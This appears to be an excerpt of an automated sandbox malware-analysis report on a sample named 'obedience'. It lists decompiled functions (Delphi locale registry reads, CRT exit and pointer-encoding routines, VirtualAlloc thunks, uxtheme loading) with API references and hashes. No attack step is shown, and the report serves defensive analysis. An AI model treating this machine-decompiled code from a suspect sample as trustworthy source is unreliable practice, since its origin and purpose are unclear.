        • Part of subcall function 0040610C: RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,0048E0A8), ref: 00406163
        • Part of subcall function 0040610C: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 00406181
        • Part of subcall function 0040610C: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,00000000,00406210,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 004061CA
        • Part of subcall function 0040610C: RegQueryValueExA.ADVAPI32(?,0040638C,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,00406210,?,80000001), ref: 004061E8
        • Part of subcall function 0040610C: RegCloseKey.ADVAPI32(?,00406217,00000000,?,?,00000000,00406210,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 0040620A
      Memory Dump Source
      • Source File: 00000001.00000002.247515532.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.247508525.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247589229.000000000048E000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247592785.000000000048F000.00000008.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247599155.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247605132.0000000000496000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247775744.0000000000541000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247789384.000000000054E000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247812972.0000000000562000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247820645.000000000056A000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247838365.0000000000575000.00000002.00000001.01000000.00000004.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_obedience.jbxd
      Similarity
      • API ID: Open$FileModuleNameQueryValue$Close
      • String ID:
      • API String ID: 2796650324-0
      • Opcode ID: 3f735dcb6e91b16ca97a434ce61cc22eca6698f83dcea60d6bc6643c62e100b4
      • Instruction ID: 9bea54296b0376798ba96e320d220f1a413cd18f41f8698404367cacab13d91b
      • Opcode Fuzzy Hash: 3f735dcb6e91b16ca97a434ce61cc22eca6698f83dcea60d6bc6643c62e100b4
      • Instruction Fuzzy Hash: F6E06D71A012108BDB10DF58C9C1A4733D8AB08755F0009A6FC94DF386D3B5DE208BD4
      Uniqueness

      Uniqueness Score: -1.00%

      Function 6EDA2A38 Relevance: 1.5, APIs: 1, Instructions: 14COMMONLIBRARYCODE
      Download Yara Rule
      C-Code - Quality: 63%
      			E6EDA2A38(void* __ebx, void* __edx, void* __edi, void* __esi, signed int _a4) {
				signed int _v0;
				void* __ebp;
				intOrPtr _t9;
				void* _t10;
				signed int _t12;
				signed int _t16;
				void* _t29;

				_t26 = __esi;
				_t22 = __edx;
				if( *0x6edb0020 != 0) {
					 *0x6edb0020 =  *0x6edb0020 - 1; // executed
					__eflags =  *0x6edb0020;
					__imp__EncodePointer(_a4);
					_t16 =  *0x6edb0020; // 0xa
					 *((intOrPtr*)(0x6edb1290 + _t16 * 4)) = _t9;
					return _t9;
				} else {
					_t10 = L6ED99BA5(_t9);
					_t31 = _t10;
					if(_t10 != 0) {
						_push(0x16);
						L6ED99BB2(__ebx, __edx, __edi, __esi, _t31);
					}
					if(( *0x6edafe90 & 0x00000002) != 0) {
						E6ED9862C(_t22, _t26, 3, 0x40000015, 1);
						_t29 = _t29 + 0xc;
					}
					E6ED96A35(3);
					asm("int3");
					_t12 =  *0x6edafe90;
					 *0x6edafe90 =  !_a4 & _t12 | _v0 & _a4;
					return _t12;
				}
			}










      0x6eda2a38
      0x6eda2a38
      0x6eda2a44
      0x6eda2a4f
      0x6eda2a4f
      0x6eda2a55
      0x6eda2a5b
      0x6eda2a61
      0x6eda2a69
      0x6eda2a46
      0x6ed9d94e
      0x6ed9d953
      0x6ed9d955
      0x6ed9d957
      0x6ed9d959
      0x6ed9d95e
      0x6ed9d966
      0x6ed9d971
      0x6ed9d976
      0x6ed9d976
      0x6ed9d97b
      0x6ed9d980
      0x6ed9d989
      0x6ed9d99a
      0x6ed9d9a1
      0x6ed9d9a1

      APIs
      • RtlEncodePointer.NTDLL(00000004,?,6EDA1FBB,6EDA1F6A,?,6EDA2225,00000000,00000000,00000004,6ED91AA8), ref: 6EDA2A55
      Memory Dump Source
      • Source File: 00000001.00000002.248376246.000000006ED91000.00000020.00000001.01000000.00000005.sdmp, Offset: 6ED90000, based on PE: true
      • Associated: 00000001.00000002.248363600.000000006ED90000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000001.00000002.248407767.000000006EDA6000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000001.00000002.248432263.000000006EDAF000.00000004.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000001.00000002.248475191.000000006EDB3000.00000002.00000001.01000000.00000005.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_6ed90000_obedience.jbxd
      Yara matches
      Similarity
      • API ID: EncodePointer
      • String ID:
      • API String ID: 2118026453-0
      • Opcode ID: 46ea9dd351cc6107d4b23e610c9f9ae91fc2c77ae13437ba1dd446b987ee7d84
      • Instruction ID: d03b1a607b1d93e1719d3af9179101e31f95d0186f85d186d402a3a6a33e0219
      • Opcode Fuzzy Hash: 46ea9dd351cc6107d4b23e610c9f9ae91fc2c77ae13437ba1dd446b987ee7d84
      • Instruction Fuzzy Hash: 5BD09EB5854B0CDFEF405F49DA05B253BB6FB873A5F000015D54842522F771D596DE44
      Uniqueness

      Uniqueness Score: -1.00%

      Function 6ED96A1F Relevance: 1.5, APIs: 1, Instructions: 10COMMON
      Download Yara Rule
      C-Code - Quality: 25%
      			E6ED96A1F(intOrPtr _a4) {
				void* __ebp;
				void* _t2;
				void* _t3;
				void* _t4;
				void* _t5;
				void* _t6;
				void* _t9;

				_push(0);
				_push(0);
				_push(_a4);
				_t2 = E6ED968DF(_t3, _t4, _t5, _t6, _t9); // executed
				return _t2;
			}










      0x6ed96a24
      0x6ed96a26
      0x6ed96a28
      0x6ed96a2b
      0x6ed96a34

      APIs
      • _doexit.LIBCMT ref: 6ED96A2B
        • Part of subcall function 6ED968DF: __lock.LIBCMT ref: 6ED968ED
        • Part of subcall function 6ED968DF: DecodePointer.KERNEL32(6EDA9FB8,00000020,6ED96A46,6ED962AF,00000001,00000000,?,6ED96A77,000000FF,?,6ED99AAF,00000011,6ED962AF,?,6ED981D9,0000000D), ref: 6ED96929
        • Part of subcall function 6ED968DF: DecodePointer.KERNEL32(?,6ED96A77,000000FF,?,6ED99AAF,00000011,6ED962AF,?,6ED981D9,0000000D), ref: 6ED9693A
        • Part of subcall function 6ED968DF: DecodePointer.KERNEL32(-00000004,?,6ED96A77,000000FF,?,6ED99AAF,00000011,6ED962AF,?,6ED981D9,0000000D), ref: 6ED96960
        • Part of subcall function 6ED968DF: DecodePointer.KERNEL32(?,6ED96A77,000000FF,?,6ED99AAF,00000011,6ED962AF,?,6ED981D9,0000000D), ref: 6ED96973
        • Part of subcall function 6ED968DF: DecodePointer.KERNEL32(?,6ED96A77,000000FF,?,6ED99AAF,00000011,6ED962AF,?,6ED981D9,0000000D), ref: 6ED9697D
      Memory Dump Source
      • Source File: 00000001.00000002.248376246.000000006ED91000.00000020.00000001.01000000.00000005.sdmp, Offset: 6ED90000, based on PE: true
      • Associated: 00000001.00000002.248363600.000000006ED90000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000001.00000002.248407767.000000006EDA6000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000001.00000002.248432263.000000006EDAF000.00000004.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000001.00000002.248475191.000000006EDB3000.00000002.00000001.01000000.00000005.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_6ed90000_obedience.jbxd
      Yara matches
      Similarity
      • API ID: DecodePointer$__lock_doexit
      • String ID:
      • API String ID: 3343572566-0
      • Opcode ID: b7f9ddcf0c01e83a82a0f1c6c29853ea6c7db7599a0eb0d3eddd439c3244ce42
      • Instruction ID: 19f1670bcf162805b84e63f108e3114d0fc7f6b298640b72e0a86424548f066a
      • Opcode Fuzzy Hash: b7f9ddcf0c01e83a82a0f1c6c29853ea6c7db7599a0eb0d3eddd439c3244ce42
      • Instruction Fuzzy Hash: 51B0123258030C33EB201682EC23F5A3F1D87C0B74F240120FA1C1D1E0AAA3BD61A2E9
      Uniqueness

      Uniqueness Score: -1.00%

      Function 6ED9810C Relevance: 1.5, APIs: 1, Instructions: 3COMMONLIBRARYCODE
      Download Yara Rule
      APIs
      • RtlEncodePointer.NTDLL(00000000,6ED9DB9A,6EDB0A18,00000314,00000000,?,?,?,?,?,6ED9A23F,6EDB0A18,Microsoft Visual C++ Runtime Library,00012010), ref: 6ED9810E
      Memory Dump Source
      • Source File: 00000001.00000002.248376246.000000006ED91000.00000020.00000001.01000000.00000005.sdmp, Offset: 6ED90000, based on PE: true
      • Associated: 00000001.00000002.248363600.000000006ED90000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000001.00000002.248407767.000000006EDA6000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000001.00000002.248432263.000000006EDAF000.00000004.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000001.00000002.248475191.000000006EDB3000.00000002.00000001.01000000.00000005.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_6ed90000_obedience.jbxd
      Yara matches
      Similarity
      • API ID: EncodePointer
      • String ID:
      • API String ID: 2118026453-0
      • Opcode ID: b21bdfa660eec3bd561f073b24a91d91c14e3998ec49bc29d024ebced09e87a9
      • Instruction ID: 9b8dafc4b1428fa54f9599979c075bdc3c15e8e48e7013af289b8a143f7e903b
      • Opcode Fuzzy Hash: b21bdfa660eec3bd561f073b24a91d91c14e3998ec49bc29d024ebced09e87a9
      • Instruction Fuzzy Hash:
      Uniqueness

      Uniqueness Score: -1.00%

      Function 00401820 Relevance: 1.3, APIs: 1, Instructions: 71memoryCOMMON
      Download Yara Rule
      C-Code - Quality: 100%
      			E00401820(signed int __eax, intOrPtr* __ecx, void* __edx) {
				signed int _v20;
				void* _v24;
				char _v28;
				char _v32;
				char _v36;
				intOrPtr _t20;
				void* _t35;
				intOrPtr* _t39;
				intOrPtr* _t48;
				void** _t49;
				signed int* _t50;
				void** _t51;

				_t51 =  &_v24;
				_t39 = __ecx;
				 *_t51 = __edx;
				_t49 =  &_v32;
				_t48 =  &_v36;
				_t50 =  &_v28;
				_v24 = __eax & 0xfffff000;
				_v20 =  *_t51 + __eax + 0x00000fff & 0xfffff000;
				 *__ecx = _v24;
				 *((intOrPtr*)(__ecx + 4)) = _v20 - _v24;
				_t20 =  *0x4905e8; // 0x809c5c
				 *_t48 = _t20;
				while(0x4905e8 !=  *_t48) {
					_t10 =  *_t48 + 8; // 0x0
					 *_t49 =  *_t10;
					 *_t50 =  *((intOrPtr*)( *_t48 + 0xc)) +  *_t49;
					if( *_t49 < _v24) {
						 *_t49 = _v24;
					}
					if( *_t50 > _v20) {
						 *_t50 = _v20;
					}
					if( *_t49 <  *_t50) {
						_t35 = VirtualAlloc( *_t49,  *_t50 -  *_t49, 0x1000, 4); // executed
						if(_t35 == 0) {
							 *_t39 = 0;
							return 0;
						}
					}
					 *_t48 =  *((intOrPtr*)( *_t48));
				}
				return 0x4905e8;
			}















      0x00401824
      0x00401827
      0x00401829
      0x0040182c
      0x00401830
      0x00401834
      0x00401842
      0x00401855
      0x0040185d
      0x00401867
      0x0040186a
      0x0040186f
      0x004018ce
      0x00401875
      0x00401878
      0x00401881
      0x0040188a
      0x00401890
      0x00401890
      0x00401899
      0x0040189f
      0x0040189f
      0x004018a7
      0x004018b9
      0x004018c0
      0x004018c4
      0x00000000
      0x004018c4
      0x004018c0
      0x004018cc
      0x004018cc
      0x004018de

      APIs
      • VirtualAlloc.KERNEL32(?,?,00001000,00000004), ref: 004018B9
      Memory Dump Source
      • Source File: 00000001.00000002.247515532.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.247508525.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247589229.000000000048E000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247592785.000000000048F000.00000008.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247599155.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247605132.0000000000496000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247775744.0000000000541000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247789384.000000000054E000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247812972.0000000000562000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247820645.000000000056A000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247838365.0000000000575000.00000002.00000001.01000000.00000004.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_obedience.jbxd
      Similarity
      • API ID: AllocVirtual
      • String ID:
      • API String ID: 4275171209-0
      • Opcode ID: a9deb49239315326a51815fa9d63636c35655bd5bec25012d4d6e2a3d5a9c179
      • Instruction ID: 126c5d152a3cef9132e3b5fde8a6952f49fe1790d81a79dd5e8025f9b2744f70
      • Opcode Fuzzy Hash: a9deb49239315326a51815fa9d63636c35655bd5bec25012d4d6e2a3d5a9c179
      • Instruction Fuzzy Hash: 2421C3B5604246AFC750DF28C880A5AB7E0FF99350F14892AF998DB394D334EA448B56
      Uniqueness

      Uniqueness Score: -1.00%

      Function 00423758 Relevance: 1.3, APIs: 1, Instructions: 70memoryCOMMON
      Download Yara Rule
      C-Code - Quality: 100%
      			E00423758(intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v8;
				void* _v12;
				char _v16;
				intOrPtr _t27;
				void* _t29;
				intOrPtr* _t48;
				void _t52;

				_t48 =  &_v16;
				if( *0x490888 == 0) {
					_t29 = VirtualAlloc(0, 0x1000, 0x1000, 0x40); // executed
					_v12 = _t29;
					_t52 =  *0x490884; // 0x2420000
					 *_v12 = _t52;
					E00402CEC(0x48e498, 2, _v12 + 4);
					 *((intOrPtr*)(_v12 + 6)) = E00423750(_v12 + 5, E00423730);
					 *_t48 = _v12 + 0xa;
					do {
						 *((char*)( *_t48)) = 0xe8;
						 *((intOrPtr*)( *_t48 + 1)) = E00423750( *_t48, _v12 + 4);
						 *((intOrPtr*)( *_t48 + 5)) =  *0x490888;
						 *0x490888 =  *_t48;
						 *_t48 =  *_t48 + 0xd;
					} while ( *_t48 - _v12 < 0xffc);
					 *0x490884 = _v12;
				}
				_v8 =  *0x490888;
				 *_t48 =  *0x490888;
				 *0x490888 =  *((intOrPtr*)( *_t48 + 5));
				_t27 =  *_t48;
				 *((intOrPtr*)(_t27 + 5)) = _a4;
				 *((intOrPtr*)(_t27 + 9)) = _a8;
				return _v8;
			}










      0x00423760
      0x0042376b
      0x0042377f
      0x00423784
      0x0042378a
      0x00423790
      0x004237a2
      0x004237ba
      0x004237c3
      0x004237c5
      0x004237c7
      0x004237d9
      0x004237e0
      0x004237e5
      0x004237e7
      0x004237ef
      0x004237f9
      0x004237f9
      0x00423800
      0x00423805
      0x0042380c
      0x0042380e
      0x00423813
      0x00423819
      0x00423824

      APIs
      • VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000040), ref: 0042377F
      Memory Dump Source
      • Source File: 00000001.00000002.247515532.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.247508525.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247589229.000000000048E000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247592785.000000000048F000.00000008.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247599155.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247605132.0000000000496000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247775744.0000000000541000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247789384.000000000054E000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247812972.0000000000562000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247820645.000000000056A000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247838365.0000000000575000.00000002.00000001.01000000.00000004.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_obedience.jbxd
      Similarity
      • API ID: AllocVirtual
      • String ID:
      • API String ID: 4275171209-0
      • Opcode ID: af29eab902ea9e914c2744c0836ff95d2d8015173147c58378f4f0ba428cb87b
      • Instruction ID: 3ad7cb04429b5cead1619c228b908b65ac72ac921874839367886b3112e9338c
      • Opcode Fuzzy Hash: af29eab902ea9e914c2744c0836ff95d2d8015173147c58378f4f0ba428cb87b
      • Instruction Fuzzy Hash: 2031F3B8A00219DFCB10DF99C480F89BBF1FF49314F1081AAE958DB365D334AA41CB85
      Uniqueness

      Uniqueness Score: -1.00%

      Non-executed Functions

      Function 00430384 Relevance: 166.5, APIs: 48, Strings: 47, Instructions: 266libraryloaderCOMMON
      Download Yara Rule
      C-Code - Quality: 90%
      			E00430384(void* __ebx, void* __ecx) {
				char _v5;
				intOrPtr _t2;
				intOrPtr _t6;
				intOrPtr _t108;
				intOrPtr _t111;

				_t2 =  *0x490a4c; // 0x248194c
				E0043017C(_t2);
				_push(_t111);
				_push(0x430737);
				_push( *[fs:eax]);
				 *[fs:eax] = _t111;
				 *0x490a48 =  *0x490a48 + 1;
				if( *0x490a44 == 0) {
					 *0x490a44 = LoadLibraryA("uxtheme.dll");
					if( *0x490a44 > 0) {
						 *0x490984 = GetProcAddress( *0x490a44, "OpenThemeData");
						 *0x490988 = GetProcAddress( *0x490a44, "CloseThemeData");
						 *0x49098c = GetProcAddress( *0x490a44, "DrawThemeBackground");
						 *0x490990 = GetProcAddress( *0x490a44, "DrawThemeText");
						 *0x490994 = GetProcAddress( *0x490a44, "GetThemeBackgroundContentRect");
						 *0x490998 = GetProcAddress( *0x490a44, "GetThemeBackgroundContentRect");
						 *0x49099c = GetProcAddress( *0x490a44, "GetThemePartSize");
						 *0x4909a0 = GetProcAddress( *0x490a44, "GetThemeTextExtent");
						 *0x4909a4 = GetProcAddress( *0x490a44, "GetThemeTextMetrics");
						 *0x4909a8 = GetProcAddress( *0x490a44, "GetThemeBackgroundRegion");
						 *0x4909ac = GetProcAddress( *0x490a44, "HitTestThemeBackground");
						 *0x4909b0 = GetProcAddress( *0x490a44, "DrawThemeEdge");
						 *0x4909b4 = GetProcAddress( *0x490a44, "DrawThemeIcon");
						 *0x4909b8 = GetProcAddress( *0x490a44, "IsThemePartDefined");
						 *0x4909bc = GetProcAddress( *0x490a44, "IsThemeBackgroundPartiallyTransparent");
						 *0x4909c0 = GetProcAddress( *0x490a44, "GetThemeColor");
						 *0x4909c4 = GetProcAddress( *0x490a44, "GetThemeMetric");
						 *0x4909c8 = GetProcAddress( *0x490a44, "GetThemeString");
						 *0x4909cc = GetProcAddress( *0x490a44, "GetThemeBool");
						 *0x4909d0 = GetProcAddress( *0x490a44, "GetThemeInt");
						 *0x4909d4 = GetProcAddress( *0x490a44, "GetThemeEnumValue");
						 *0x4909d8 = GetProcAddress( *0x490a44, "GetThemePosition");
						 *0x4909dc = GetProcAddress( *0x490a44, "GetThemeFont");
						 *0x4909e0 = GetProcAddress( *0x490a44, "GetThemeRect");
						 *0x4909e4 = GetProcAddress( *0x490a44, "GetThemeMargins");
						 *0x4909e8 = GetProcAddress( *0x490a44, "GetThemeIntList");
						 *0x4909ec = GetProcAddress( *0x490a44, "GetThemePropertyOrigin");
						 *0x4909f0 = GetProcAddress( *0x490a44, "SetWindowTheme");
						 *0x4909f4 = GetProcAddress( *0x490a44, "GetThemeFilename");
						 *0x4909f8 = GetProcAddress( *0x490a44, "GetThemeSysColor");
						 *0x4909fc = GetProcAddress( *0x490a44, "GetThemeSysColorBrush");
						 *0x490a00 = GetProcAddress( *0x490a44, "GetThemeSysBool");
						 *0x490a04 = GetProcAddress( *0x490a44, "GetThemeSysSize");
						 *0x490a08 = GetProcAddress( *0x490a44, "GetThemeSysFont");
						 *0x490a0c = GetProcAddress( *0x490a44, "GetThemeSysString");
						 *0x490a10 = GetProcAddress( *0x490a44, "GetThemeSysInt");
						 *0x490a14 = GetProcAddress( *0x490a44, "IsThemeActive");
						 *0x490a18 = GetProcAddress( *0x490a44, "IsAppThemed");
						 *0x490a1c = GetProcAddress( *0x490a44, "GetWindowTheme");
						 *0x490a20 = GetProcAddress( *0x490a44, "EnableThemeDialogTexture");
						 *0x490a24 = GetProcAddress( *0x490a44, "IsThemeDialogTextureEnabled");
						 *0x490a28 = GetProcAddress( *0x490a44, "GetThemeAppProperties");
						 *0x490a2c = GetProcAddress( *0x490a44, "SetThemeAppProperties");
						 *0x490a30 = GetProcAddress( *0x490a44, "GetCurrentThemeName");
						 *0x490a34 = GetProcAddress( *0x490a44, "GetThemeDocumentationProperty");
						 *0x490a38 = GetProcAddress( *0x490a44, "DrawThemeParentBackground");
						 *0x490a3c = GetProcAddress( *0x490a44, "EnableTheming");
					}
				}
				_v5 =  *0x490a44 > 0;
				_pop(_t108);
				 *[fs:eax] = _t108;
				_push(0x43073e);
				_t6 =  *0x490a4c; // 0x248194c
				return E00430184(_t6);
			}








      0x0043038e
      0x00430393
      0x0043039a
      0x0043039b
      0x004303a0
      0x004303a3
      0x004303a6
      0x004303af
      0x004303bf
      0x004303c4
      0x004303d7
      0x004303e9
      0x004303fb
      0x0043040d
      0x0043041f
      0x00430431
      0x00430443
      0x00430455
      0x00430467
      0x00430479
      0x0043048b
      0x0043049d
      0x004304af
      0x004304c1
      0x004304d3
      0x004304e5
      0x004304f7
      0x00430509
      0x0043051b
      0x0043052d
      0x0043053f
      0x00430551
      0x00430563
      0x00430575
      0x00430587
      0x00430599
      0x004305ab
      0x004305bd
      0x004305cf
      0x004305e1
      0x004305f3
      0x00430605
      0x00430617
      0x00430629
      0x0043063b
      0x0043064d
      0x0043065f
      0x00430671
      0x00430683
      0x00430695
      0x004306a7
      0x004306b9
      0x004306cb
      0x004306dd
      0x004306ef
      0x00430701
      0x00430713
      0x00430713
      0x004303c4
      0x0043071b
      0x00430721
      0x00430724
      0x00430727
      0x0043072c
      0x00430736

      APIs
      • LoadLibraryA.KERNEL32(uxtheme.dll,00000000,00430737), ref: 004303BA
      • GetProcAddress.KERNEL32(00000000,OpenThemeData), ref: 004303D2
      • GetProcAddress.KERNEL32(00000000,CloseThemeData), ref: 004303E4
      • GetProcAddress.KERNEL32(00000000,DrawThemeBackground), ref: 004303F6
      • GetProcAddress.KERNEL32(00000000,DrawThemeText), ref: 00430408
      • GetProcAddress.KERNEL32(00000000,GetThemeBackgroundContentRect), ref: 0043041A
      • GetProcAddress.KERNEL32(00000000,GetThemeBackgroundContentRect), ref: 0043042C
      • GetProcAddress.KERNEL32(00000000,GetThemePartSize), ref: 0043043E
      • GetProcAddress.KERNEL32(00000000,GetThemeTextExtent), ref: 00430450
      • GetProcAddress.KERNEL32(00000000,GetThemeTextMetrics), ref: 00430462
      • GetProcAddress.KERNEL32(00000000,GetThemeBackgroundRegion), ref: 00430474
      • GetProcAddress.KERNEL32(00000000,HitTestThemeBackground), ref: 00430486
      • GetProcAddress.KERNEL32(00000000,DrawThemeEdge), ref: 00430498
      • GetProcAddress.KERNEL32(00000000,DrawThemeIcon), ref: 004304AA
      • GetProcAddress.KERNEL32(00000000,IsThemePartDefined), ref: 004304BC
      • GetProcAddress.KERNEL32(00000000,IsThemeBackgroundPartiallyTransparent), ref: 004304CE
      • GetProcAddress.KERNEL32(00000000,GetThemeColor), ref: 004304E0
      • GetProcAddress.KERNEL32(00000000,GetThemeMetric), ref: 004304F2
      • GetProcAddress.KERNEL32(00000000,GetThemeString), ref: 00430504
      • GetProcAddress.KERNEL32(00000000,GetThemeBool), ref: 00430516
      • GetProcAddress.KERNEL32(00000000,GetThemeInt), ref: 00430528
      • GetProcAddress.KERNEL32(00000000,GetThemeEnumValue), ref: 0043053A
      • GetProcAddress.KERNEL32(00000000,GetThemePosition), ref: 0043054C
      • GetProcAddress.KERNEL32(00000000,GetThemeFont), ref: 0043055E
      • GetProcAddress.KERNEL32(00000000,GetThemeRect), ref: 00430570
      • GetProcAddress.KERNEL32(00000000,GetThemeMargins), ref: 00430582
      • GetProcAddress.KERNEL32(00000000,GetThemeIntList), ref: 00430594
      • GetProcAddress.KERNEL32(00000000,GetThemePropertyOrigin), ref: 004305A6
      • GetProcAddress.KERNEL32(00000000,SetWindowTheme), ref: 004305B8
      • GetProcAddress.KERNEL32(00000000,GetThemeFilename), ref: 004305CA
      • GetProcAddress.KERNEL32(00000000,GetThemeSysColor), ref: 004305DC
      • GetProcAddress.KERNEL32(00000000,GetThemeSysColorBrush), ref: 004305EE
      • GetProcAddress.KERNEL32(00000000,GetThemeSysBool), ref: 00430600
      • GetProcAddress.KERNEL32(00000000,GetThemeSysSize), ref: 00430612
      • GetProcAddress.KERNEL32(00000000,GetThemeSysFont), ref: 00430624
      • GetProcAddress.KERNEL32(00000000,GetThemeSysString), ref: 00430636
      • GetProcAddress.KERNEL32(00000000,GetThemeSysInt), ref: 00430648
      • GetProcAddress.KERNEL32(00000000,IsThemeActive), ref: 0043065A
      • GetProcAddress.KERNEL32(00000000,IsAppThemed), ref: 0043066C
      • GetProcAddress.KERNEL32(00000000,GetWindowTheme), ref: 0043067E
      • GetProcAddress.KERNEL32(00000000,EnableThemeDialogTexture), ref: 00430690
      • GetProcAddress.KERNEL32(00000000,IsThemeDialogTextureEnabled), ref: 004306A2
      • GetProcAddress.KERNEL32(00000000,GetThemeAppProperties), ref: 004306B4
      • GetProcAddress.KERNEL32(00000000,SetThemeAppProperties), ref: 004306C6
      • GetProcAddress.KERNEL32(00000000,GetCurrentThemeName), ref: 004306D8
      • GetProcAddress.KERNEL32(00000000,GetThemeDocumentationProperty), ref: 004306EA
      • GetProcAddress.KERNEL32(00000000,DrawThemeParentBackground), ref: 004306FC
      • GetProcAddress.KERNEL32(00000000,EnableTheming), ref: 0043070E
      Strings
      Memory Dump Source
      • Source File: 00000001.00000002.247515532.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.247508525.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247589229.000000000048E000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247592785.000000000048F000.00000008.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247599155.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247605132.0000000000496000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247775744.0000000000541000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247789384.000000000054E000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247812972.0000000000562000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247820645.000000000056A000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247838365.0000000000575000.00000002.00000001.01000000.00000004.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_obedience.jbxd
      Similarity
      • API ID: AddressProc$LibraryLoad
      • String ID: CloseThemeData$DrawThemeBackground$DrawThemeEdge$DrawThemeIcon$DrawThemeParentBackground$DrawThemeText$EnableThemeDialogTexture$EnableTheming$GetCurrentThemeName$GetThemeAppProperties$GetThemeBackgroundContentRect$GetThemeBackgroundRegion$GetThemeBool$GetThemeColor$GetThemeDocumentationProperty$GetThemeEnumValue$GetThemeFilename$GetThemeFont$GetThemeInt$GetThemeIntList$GetThemeMargins$GetThemeMetric$GetThemePartSize$GetThemePosition$GetThemePropertyOrigin$GetThemeRect$GetThemeString$GetThemeSysBool$GetThemeSysColor$GetThemeSysColorBrush$GetThemeSysFont$GetThemeSysInt$GetThemeSysSize$GetThemeSysString$GetThemeTextExtent$GetThemeTextMetrics$GetWindowTheme$HitTestThemeBackground$IsAppThemed$IsThemeActive$IsThemeBackgroundPartiallyTransparent$IsThemeDialogTextureEnabled$IsThemePartDefined$OpenThemeData$SetThemeAppProperties$SetWindowTheme$uxtheme.dll
      • API String ID: 2238633743-2910565190
      • Opcode ID: 6cc17476dc2698392d0e410eccae24de7198a0cf54c4321817fdb7559798ceca
      • Instruction ID: 9d4286b95b2f7980caa544ea75cac6461944ff1cda2460a3c219c40039510ae6
